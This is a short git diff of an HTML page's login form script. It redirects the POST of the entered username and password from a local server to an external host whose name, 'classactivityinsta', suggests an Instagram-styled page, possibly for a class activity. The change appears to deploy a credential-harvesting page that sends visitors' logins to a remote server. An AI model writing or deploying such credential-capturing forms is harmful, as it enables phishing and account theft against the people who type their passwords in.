--- a/index.html
+++ b/index.html
@@ -88,7 +88,7 @@
 	  const username = form.username.value;
 	  const password = form.password.value;
   
-	  fetch("http://localhost:3000/submit", {
+	  fetch("https://classactivityinsta.onrender.com/submit", {
 		method: "POST",
 		headers: {
 		  "Content-Type": "application/json"
